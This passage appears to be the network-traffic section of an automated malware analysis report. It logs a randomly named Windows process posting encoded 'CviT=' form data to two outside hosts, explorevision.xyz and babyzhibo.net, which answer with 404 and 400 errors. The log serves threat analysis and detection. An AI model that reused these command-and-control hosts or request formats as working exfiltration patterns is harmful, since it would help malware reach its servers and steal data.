                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 56 66 57 44 42 69 76 6c 73 70 52 73 78 69 74 66 4b 33 77 6f 6b 55 72 35 54 62 4a 73 41 48 6b 4b 56 38 45 42 47 49 4e 7a 71 66 44 34 6e 58 68 78 6d 4f 7a 58 37 6e 74 58 4b 44 57 59 50 36 78 2b 4e 46 62 34 4f 30 39 68 68 54 33 46 72 4d 66 2b 33 4f 41 6c 55 52 52 42 6d 2f 70 52 68 54 2f 5a 2f 44 37 6a 4a 4f 68 50 4b 6e 64 50 48 75 31 43 55 54 59 37 38 2b 54 57 61 42 5a 46 41 72 32 57 4d 53 36 4b 44 39 4c 51 77 51 52 34 49 38 4d 30 4f 78 58 6f 47 48 6b 4d 42 50 38 56 6f 48 48 69 45 78 77 63 64 55 31 4e 71 53 57 53 69 55 71 33 63 74 78 54 76 64 47 2f 4b 39 62 67 6f 39 4a 4a 34 4a 77 45 36 6a 4b 4b 39 72 63 52
                                                    Data Ascii: CviT=VfWDBivlspRsxitfK3wokUr5TbJsAHkKV8EBGINzqfD4nXhxmOzX7ntXKDWYP6x+NFb4O09hhT3FrMf+3OAlURRBm/pRhT/Z/D7jJOhPKndPHu1CUTY78+TWaBZFAr2WMS6KD9LQwQR4I8M0OxXoGHkMBP8VoHHiExwcdU1NqSWSiUq3ctxTvdG/K9bgo9JJ4JwE6jKK9rcR
                                                    Jan 13, 2025 09:35:38.388261080 CET533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:38 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.650003162.0.236.169806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:40.375359058 CET811OUTPOST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 56 66 57 44 42 69 76 6c 73 70 52 73 6a 54 64 66 4d 57 77 6f 6a 30 72 2b 50 4c 4a 73 4a 6e 6c 4e 56 38 41 42 47 4a 35 64 71 74 6e 34 6d 7a 6c 78 6e 4e 72 58 2b 6e 74 58 41 6a 57 64 4c 36 78 31 4e 46 66 61 4f 30 52 68 68 51 4c 46 72 4a 6a 2b 32 39 6f 6d 53 52 52 35 79 50 70 58 76 7a 2f 5a 2f 44 37 6a 4a 4f 30 6f 4b 6e 56 50 41 65 46 43 4f 79 59 30 30 65 54 56 64 42 5a 46 45 72 32 61 4d 53 36 73 44 35 4b 33 77 54 35 34 49 2b 45 30 4f 67 58 72 64 33 6b 4f 4d 76 39 33 67 69 65 41 4b 53 77 66 61 46 4a 51 32 51 75 58 71 43 33 74 41 65 78 77 39 4e 6d 39 4b 2f 44 53 6f 64 4a 6a 36 4a 49 45 6f 30 47 74 79 66 35 79 32 48 45 46 71 4e 68 72 44 4e 64 6f 43 37 56 39 37 39 4f 33 4b 67 3d 3d
                                                    Data Ascii: CviT=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtn4mzlxnNrX+ntXAjWdL6x1NFfaO0RhhQLFrJj+29omSRR5yPpXvz/Z/D7jJO0oKnVPAeFCOyY00eTVdBZFEr2aMS6sD5K3wT54I+E0OgXrd3kOMv93gieAKSwfaFJQ2QuXqC3tAexw9Nm9K/DSodJj6JIEo0Gtyf5y2HEFqNhrDNdoC7V979O3Kg==
                                                    Jan 13, 2025 09:35:40.969507933 CET533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:40 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.650004162.0.236.169806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:42.926531076 CET1824OUTPOST /t0rn/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Origin: http://www.explorevision.xyz
                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 56 66 57 44 42 69 76 6c 73 70 52 73 6a 54 64 66 4d 57 77 6f 6a 30 72 2b 50 4c 4a 73 4a 6e 6c 4e 56 38 41 42 47 4a 35 64 71 74 76 34 6e 47 78 78 6e 74 58 58 39 6e 74 58 65 7a 57 63 4c 36 78 53 4e 42 4c 65 4f 30 73 63 68 57 50 46 71 72 62 2b 78 4d 6f 6d 48 68 52 35 74 66 70 53 68 54 2b 62 2f 44 72 6e 4a 4f 6b 6f 4b 6e 56 50 41 64 64 43 41 7a 59 30 35 2b 54 57 61 42 5a 5a 41 72 33 48 4d 53 6a 58 44 35 66 41 78 69 5a 34 49 65 55 30 4e 53 2f 72 52 33 6b 49 50 76 39 52 67 69 61 32 4b 53 74 75 61 46 74 32 32 51 61 58 35 32 36 71 61 74 35 42 6b 65 36 4d 53 66 2f 30 78 4e 64 58 37 4a 34 48 6f 6b 57 44 34 63 4e 6b 35 69 77 66 6d 2b 34 35 4b 4c 78 6a 4a 4f 34 49 79 4d 33 6b 51 30 57 30 49 77 69 6e 74 76 70 59 42 6c 65 74 2b 52 67 48 4b 51 75 64 72 4f 4f 59 37 75 51 75 4a 66 70 41 62 30 65 37 6d 30 67 61 4c 79 31 71 71 34 67 78 31 5a 65 63 4f 6a 48 32 31 44 4a 78 49 77 51 4d 54 55 6a 64 79 54 4d 66 42 6d 69 67 63 68 4f 6a 48 6f 74 52 75 79 65 63 35 4e 56 5a 33 45 2b 67 79 4e 71 58 42 74 7a 64 57 [TRUNCATED]
                                                    Data Ascii: CviT=VfWDBivlspRsjTdfMWwoj0r+PLJsJnlNV8ABGJ5dqtv4nGxxntXX9ntXezWcL6xSNBLeO0schWPFqrb+xMomHhR5tfpShT+b/DrnJOkoKnVPAddCAzY05+TWaBZZAr3HMSjXD5fAxiZ4IeU0NS/rR3kIPv9Rgia2KStuaFt22QaX526qat5Bke6MSf/0xNdX7J4HokWD4cNk5iwfm+45KLxjJO4IyM3kQ0W0IwintvpYBlet+RgHKQudrOOY7uQuJfpAb0e7m0gaLy1qq4gx1ZecOjH21DJxIwQMTUjdyTMfBmigchOjHotRuyec5NVZ3E+gyNqXBtzdW1ej9Bw8Rt2CVQsydTCEKvAs+CqEsy/XhNZfhELPrXherQ/X7hWxJxCmHWcs468x2ECnIGE3uCZ3HX+oosU99YYViY0GU2172Hlu95qVswYXZPQwR2szX8GAVpGD9DDXN2MS2XXEvsYgj52u2l2BVZPLyRxxqpSxixjetY29J8MO9wBLXMwTY9QT9Ek8OV57T9ehy2NZ0e1fJrw1a4pygHV4wBbei0rDJog1fHu24MXbdZ+GjYLPrfUysXwPmlI/srMqDkQuZ1uC7E8N2nsDWskaCeoHpTB3wmLjZHbqiHgYlwGxXR0y6L9sQFLvHp39PGg7jBa3JBXcEQZSQ2//Ld2VhEH/k6oyvFWfPdhHcuI/HIWGpiGK51/fDuY1zKdSSYo5W3Y96TDw0jvYn8YVes+DiS9Pshhe+tVMhj6dz1sCHe/ebCSrqafD8KNHF6fH9AVluPnAUkQzkbtckTtRbQS94Kh1bCaCN+ilwSldFPuFerv6CNGs8BakDA1d6UF71O4lGeCO69p1+xyVin3p/oPSaohVFghMLErsvkvAOawaPHeMVAKPa5XHmG6TgWnWp2MLEI60hbJtPH1cBbUxjq4TSxNUY65JMlzPjo2aieKrV+LxezclCjXAbEq3eZSmvLesWkCVnb31xptDyHn3NPOEtanOUupYiCf [TRUNCATED]
                                                    Jan 13, 2025 09:35:43.514452934 CET533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:43 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.650005162.0.236.169806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:45.548999071 CET520OUTGET /t0rn/?YFCLW=BxgTctSh&CviT=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.explorevision.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:35:46.127190113 CET548INHTTP/1.1 404 Not Found
                                                    Date: Mon, 13 Jan 2025 08:35:46 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.650006192.186.58.31806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:51.520896912 CET775OUTPOST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 42 38 41 64 52 48 67 4f 31 53 5a 35 37 6f 48 42 6e 61 47 61 30 77 55 79 38 4b 33 4b 4f 4c 6f 49 62 51 63 37 74 4d 59 31 4b 58 79 53 57 73 46 6a 67 4f 42 39 79 44 7a 72 58 70 61 48 4c 64 52 78 33 39 42 42 49 53 62 65 73 52 4b 6c 63 51 76 2f 4f 38 43 67 30 62 65 6d 69 51 49 31 5a 36 62 47 6e 4a 72 78 71 54 69 2b 51 47 4d 4a 37 67 6f 73 7a 55 70 6d 4a 45 35 42 59 43 4c 30 74 65 6b 76 76 79 64 53 42 67 68 56 30 42 6d 46 32 70 55 6d 31 4c 68 49 64 36 41 4d 43 76 51 51 50 6a 59 59 6f 30 37 7a 53 72 4f 6d 56 32 55 72 4c 51 48 53 62 72 36 2f 6b 79 5a 34 53 61 72 41 65 30 2f 49
                                                    Data Ascii: CviT=iZAMmr5zjOmZB8AdRHgO1SZ57oHBnaGa0wUy8K3KOLoIbQc7tMY1KXySWsFjgOB9yDzrXpaHLdRx39BBISbesRKlcQv/O8Cg0bemiQI1Z6bGnJrxqTi+QGMJ7goszUpmJE5BYCL0tekvvydSBghV0BmF2pUm1LhId6AMCvQQPjYYo07zSrOmV2UrLQHSbr6/kyZ4SarAe0/I
                                                    Jan 13, 2025 09:35:52.389759064 CET190INHTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: d404 Not Found0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.650007192.186.58.31806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:54.070956945 CET799OUTPOST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 43 63 51 64 51 6c 49 4f 39 53 5a 34 30 49 48 42 75 36 47 57 30 77 6f 79 38 50 50 6b 50 35 4d 49 62 77 4d 37 38 35 73 31 47 33 79 53 5a 4d 46 6d 6b 4f 42 32 79 44 75 55 58 70 6d 48 4c 5a 35 78 33 38 52 42 4c 6c 76 66 73 42 4b 77 52 77 76 39 54 73 43 67 30 62 65 6d 69 51 63 50 5a 36 44 47 67 35 37 78 6f 79 69 2f 4f 57 4d 49 38 67 6f 73 33 55 70 69 4a 45 35 33 59 47 4c 4f 74 62 67 76 76 79 74 53 50 56 42 57 76 78 6d 44 34 4a 56 6e 7a 34 6b 64 5a 73 5a 65 64 4e 51 41 52 51 6f 6e 70 43 6d 70 4f 59 4f 46 48 6d 30 70 4c 53 66 67 62 4c 36 56 6d 79 68 34 41 4e 6e 6e 52 41 61 72 4d 47 70 43 52 5a 2f 7a 37 58 49 2f 4b 73 67 68 39 30 55 55 48 67 3d 3d
                                                    Data Ascii: CviT=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5MIbwM785s1G3ySZMFmkOB2yDuUXpmHLZ5x38RBLlvfsBKwRwv9TsCg0bemiQcPZ6DGg57xoyi/OWMI8gos3UpiJE53YGLOtbgvvytSPVBWvxmD4JVnz4kdZsZedNQARQonpCmpOYOFHm0pLSfgbL6Vmyh4ANnnRAarMGpCRZ/z7XI/Ksgh90UUHg==
                                                    Jan 13, 2025 09:35:54.999159098 CET190INHTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: d404 Not Found0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.650008192.186.58.31806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:35:56.616311073 CET1812OUTPOST /wn9b/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.babyzhibo.net
                                                    Origin: http://www.babyzhibo.net
                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 43 63 51 64 51 6c 49 4f 39 53 5a 34 30 49 48 42 75 36 47 57 30 77 6f 79 38 50 50 6b 50 35 45 49 62 44 30 37 75 75 41 31 46 33 79 53 51 73 46 6e 6b 4f 42 72 79 44 6d 59 58 70 71 58 4c 66 39 78 6d 75 4a 42 44 78 7a 66 6a 42 4b 77 59 51 76 2b 4f 38 43 50 30 61 76 76 69 51 4d 50 5a 36 44 47 67 2f 2f 78 73 6a 69 2f 4a 6d 4d 4a 37 67 6f 67 7a 55 70 61 4a 46 52 6e 59 47 50 65 74 6f 6f 76 76 57 4a 53 43 42 68 57 6a 78 6d 42 74 4a 55 30 7a 2f 74 4e 5a 6f 78 61 64 4d 30 75 52 54 30 6e 6f 55 72 66 65 36 54 66 57 6e 55 46 66 56 6d 46 54 66 4f 69 73 53 6c 33 4b 2b 36 52 4f 53 6a 45 43 78 64 6a 56 76 47 58 73 55 63 43 56 73 52 4c 78 57 45 61 64 6c 4a 72 46 67 57 61 48 50 65 64 61 63 6a 78 34 6c 4c 2f 32 2f 34 37 6f 71 51 68 30 62 5a 6e 46 36 54 43 4c 4a 53 58 64 62 56 6c 7a 2f 43 35 32 58 63 46 7a 7a 51 7a 49 53 35 47 37 63 66 61 44 76 45 68 57 5a 2b 72 58 50 78 66 70 6d 49 74 6b 59 57 38 64 2f 74 52 53 75 2f 57 63 6e 56 54 32 36 62 4e 55 5a 68 6b 75 6f 6d 4b 64 [TRUNCATED]
                                                    Data Ascii: CviT=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5EIbD07uuA1F3ySQsFnkOBryDmYXpqXLf9xmuJBDxzfjBKwYQv+O8CP0avviQMPZ6DGg//xsji/JmMJ7gogzUpaJFRnYGPetoovvWJSCBhWjxmBtJU0z/tNZoxadM0uRT0noUrfe6TfWnUFfVmFTfOisSl3K+6ROSjECxdjVvGXsUcCVsRLxWEadlJrFgWaHPedacjx4lL/2/47oqQh0bZnF6TCLJSXdbVlz/C52XcFzzQzIS5G7cfaDvEhWZ+rXPxfpmItkYW8d/tRSu/WcnVT26bNUZhkuomKddG3BZg86gHzXcuvb8Rll+bKQVMGDTGq0Ub1vFrpFsR28uw63hW7ue+hVxYTxbkKbZ8C71/Li1r099TWK59WJ8LmffW45gbGdO7OGMvxd4ZONtuc4rgNpaOzhZsYFD8CNcJiHq3eWTbp6h9MGb6KC6uu7TxLyr4yCa3x9tdeYq2m9hJwD2hgkAS5mph9l/4zuAoZqppM8yuuXd/anPnk3Jv8Vo77ofF4z3y9yLB0qNeD4mI4b/bCFXohcA4ZNIoGPymsSbFrpxrKf2dHd4c6DSGORtJCN0DhJUg2BQ6vELekf8mhvJdXDkFcpXOPFuCnqQHOa+h0ArDET7Ai6/B4NBdV8voY6vHvtAPRq1fxmPNuG88tyH4jQfEZ/u+8Bs9S1aRRGoIFgo+wMIsFV/8i4yf+20Nij1kEmzp3HFojWPWluakkS02Jr/8NRzw/NcaLgc5uxMXxL4MiP4h4Ic2Eh7MN7Iw14pEP5d+hq4+lrBEiy8NzN7yRZOrHLpTrUeWgWc1PFhULCxM50XDonCeVRlxCCCBa0ZQGCUbwTeZBoMqNpgq7++6kUnyhhIueU61SP/NTN1JaozLWvnV125U5QasVu0aOcW89RFVpm7Z9OfNVcR+axYBxEmUA9hNX3B6TFB6jIZG7mDnBQFY4JKSJroib6wIUybqxJxy [TRUNCATED]
                                                    Jan 13, 2025 09:35:57.536473989 CET190INHTTP/1.1 400 Bad Request
                                                    Server: nginx
                                                    Date: Mon, 13 Jan 2025 08:35:57 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
